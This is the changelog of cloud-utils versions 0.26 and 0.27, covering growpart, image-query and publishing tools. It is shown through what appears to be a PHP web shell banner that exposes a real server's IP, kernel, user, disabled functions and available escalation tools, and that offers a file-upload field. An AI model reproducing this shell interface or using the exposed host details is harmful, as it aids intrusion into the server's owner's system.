| Server IP : 162.214.74.102 / Your IP : 216.73.216.139 Web Server : Apache System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 User : lrsys ( 1015) PHP Version : 5.6.40 Disable Function : exec,passthru,shell_exec,system MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/cloud-utils-0.27/ |
Upload File : |
0.27
- cloud-publish-image: add '--hook-img' flag to cloud-publish-image and
passthrough that flag from cloud-publish-ubuntu and cloud-publish-tarball.
- ubuntu-cloudimg-query: become aware of m3.* instance-sizes
- fix make-dist-tarball to not have top level directory
named 'cloud-init' (thanks Juerg Haefliger)
- write-mime-multipart: add 'include-once-url' to the supported types.
- growpart: add support for resizing GPT partitions by using sgdisk from
gptfdisk project. Thanks to Juerg Haefliger.
- growpart: add support for partx 'update' which allows resizing a partition
that is mounted.
- growpart: change exit codes. exit 1 on "no change necessary",
0 on "grown", 2 on "failure". This allows other tools that use growpart to
examine the exit status rather than parsing the output.
0.26
- install ubuntu cloud image keyring into /usr/share/keyrings/
- ubuntu-cloudimg-query, ubuntu-ec2-run:
- be aware of m1.medium instance type
- support "amd64 on all sizes"
- be aware of hi1.4xlarge
- always pass block device mapping for sdb if instance type has it
rather than relying on ami registration.
- when downloading images use wget dot:mega for less verbose
- growpart:
- use 'sfdisk --no-reread' (LP: #942788)
- if sfdisk fails, send output to stderr
- cloud-publish-tarball: fix for tarballs without a ramdisk
- ubuntu-cloudimg-query: allow baseurl to be read from environment var
- growpart: support growpart of nbd devices (/dev/nbd[0-9]) and
/dev/loop devices.
- add cloud-localds utility
- ubuntu-cloudimg-query: add 'serial' to tokens availble for substitution